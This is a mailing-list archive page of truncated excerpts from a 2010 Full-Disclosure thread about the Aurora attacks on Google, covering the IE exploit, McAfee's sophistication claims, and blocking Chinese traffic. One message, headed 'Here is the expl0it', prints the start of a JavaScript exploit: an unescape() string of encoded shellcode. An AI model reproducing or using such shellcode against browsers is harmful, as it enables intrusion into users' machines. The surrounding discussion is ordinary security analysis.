Jokes aside has anyone seen this?
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0ftype=js
On Mon, Jan 18, 2010 at 1:44 PM, Christian Sciberras uuf6...@gmail.comwrote:
Bipin,
I'm not wise either, at least not when it comes to security, I'm just
still discovering this
Mark, Dan, Smasher, etc. Thanks for the feedback.
I saw the thread this weekend, but I had to wait until I today to respond. My
main motivation was to point out that there is no free lunch, and often even
security professionals forget to think critically. It was not meant to be a
thorough
Now, by analyzing the software used in the break-ins against Google
and dozens of other companies, Joe Stewart, a malware specialist with
SecureWorks, a computer security company based in Atlanta, said he
determined the main program used in the attack contained a module
based on an unusual
Wow such depth! Such insight! WOW
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Densmore, Todd
Sent: 15. januar 2010 23:34
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China
-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Densmore, Todd
Sent: 15. januar 2010 23:34
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China, All The Time
Here is my 2 cents on both Google and iiScan
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive
So, What is the cost of buying a fighter jet? What would be the cost
of hardening windows (say) by default,straight out of Microsoft, with
good defense in depth strategy (or least an ad-on)?
( Sometimes identifying your enemy is difficult than the battle itself
and sometimes the battle exists
Bipin,
You're got your priorities wrong, and unfortunately many companies are
coming to the same conclusion.
The problem with security is fixing where is needed rather then shout out
this product is secure or hardening.
What I'm talking about; Windows XP came with it's own Firewall, but please
Bipin,
I'm not wise either, at least not when it comes to security, I'm just
still discovering this world.
Other then that, I didn't understand a thing of what you said.
Regards,
Christian Sciberras.
On Mon, Jan 18, 2010 at 8:42 PM, Bipin Gautam bipin.gau...@gmail.comwrote:
Christian!
I
On Thursday 14 January 2010 21:49:05 Christian Sciberras wrote:
They used an IE exploit to get in.
The people at *Google* use *IE*?!! Besides, how does an exploit in IE
affect the server?
It would affect a person with login rights to a server.
This wasn't just an attack on Google, btw, it was
My question was mostly rhetoric, I tried to imply the point on why
computers with sensitive information were;
1. not fully up to date (=from the top of my had, the exploit had
several issues in non-standard browser versions?)
2. running internet explorer (=more known as a target, nothing against
No, that was actually configuration description; best of luck finding
our facility.
On Fri, Jan 15, 2010 at 7:42 PM, Benji m...@b3nji.com wrote:
Actually you were boasting, it was irrelevant to have what you have as a
security precausion. Infact, one could argue that you were making your setup
Actually you were boasting, it was irrelevant to have what you have as a
security precausion. Infact, one could argue that you were making your setup
insecure by telling people how you're secured from the get go.
On Fri, Jan 15, 2010 at 6:38 PM, Christian Sciberras uuf6...@gmail.comwrote:
My
I'll put it this way.
Im an attacker in your network, trying to get access to your most sensitive
information. Ive identified the server that stores this information and Im
looking around for keys/passwords etc etc etc.
Are you saying it wouldnt help me to know that I needed 5 keys, thus
Physical keys. There's like over 100 different keys in the whole
complex... Sure, helpful to know about the needle in a haystack. The
question is, how much is needed to sift through that haystack.
One day evil maid approach is ok, a couple of days evil
technician, possibly, but I doubt anyone
Here is my 2 cents on both Google and iiScan
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/01/15/china-google-and-web-security.aspx
~todd
___
Full-Disclosure - We believe in it.
Charter:
Can you explain how this is sophisticated. It looks to me like most
decent malware samples I've RE'd:
The result: triple encrypted shell code which downloads multiple
encrypted binaries used to drop an encrypted payload on a target machine
which then establishes an encrypted SSL channel to
Todd, have you verified this encryption specifically the statement by McAfee:
One of the malicious programs opened a remote backdoor to the
computer, establishing an encrypted covert channel that masqueraded as
an SSL connection to avoid detection.
I assume by masquerade they mean the fact it is
Here is the expl0it.
htmlscriptvar sc = unescape(
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%u%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
If it's stupid and it works, it isn't stupid.
On Jan 15, 2010, at 11:07 PM, Marc Maiffret m...@marcmaiffret.com
wrote:
Todd, have you verified this encryption specifically the statement
by McAfee:
One of the malicious programs opened a remote backdoor to the
computer, establishing an
Dan, I think the conversation we were having was centered around
McAfee saying this is ultra sophisticated and using descriptions that
are potentially very inaccurate in cases. I do not think anyone is
questioning whether this exploit, being simple or not, was successful.
Obviously it was
With all the hubbub around China yet again, I would like to remind you of the
utilities available at Hammer of God that allow one to completely block any
or all traffic to or from China or any other country in the world via
ISA/TMG.
Source for pre-built blocklists in DNSBL, CIDR, or
Interesting article on zdnet, talking about the targeting of the
lawful intercept system at Google
…they [hackers] apparently were able to access a system used to help
Google comply with search warrants by providing data on Google users,
said a source familiar with the situation, who spoke on
They used an IE exploit to get in. I don't understand Google said that they
used a complex way to access their systems. AFAIK many home users are hacked
daily the same way
On Thu, Jan 14, 2010 at 7:44 PM, Ivan . ivan...@gmail.com wrote:
Interesting article on zdnet, talking about the
They used an IE exploit to get in.
The people at *Google* use *IE*?!! Besides, how does an exploit in IE
affect the server?
On Fri, Jan 15, 2010 at 4:47 AM, James Matthews nytrok...@gmail.com wrote:
They used an IE exploit to get in. I don't understand Google said that they
used a complex way
...@lists.grok.org.uk [mailto:full-
disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
Sent: Wednesday, January 13, 2010 1:01 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] All China, All The Time
With all the hubbub around China yet again, I would like to remind you
I hate to be picky but
the entire country’s network is a festering cesspool of scum and villainy.
The correct collective noun for scum and villainy is of course 'wretched
hive'.
Regards
-- stuart
___
Full-Disclosure - We believe in it.
Charter:
(Hammer of God)
Sent: Wednesday, January 13, 2010 1:50 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China, All The Time
P.S. The tag line was meant to be funny, but as one kind reply pointed
out, it may be taken the wrong way. If so, and you CAN read
Haha, and the OSX Translate widget's translation:
If you may see this point, did not respond that - I will not obtain it
/me wonder's what the Chinese equiv of engrish.com is... 0o
On 1/13/10 10:17 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
Yikes. More information. The tag was
28 matches
Mail list logo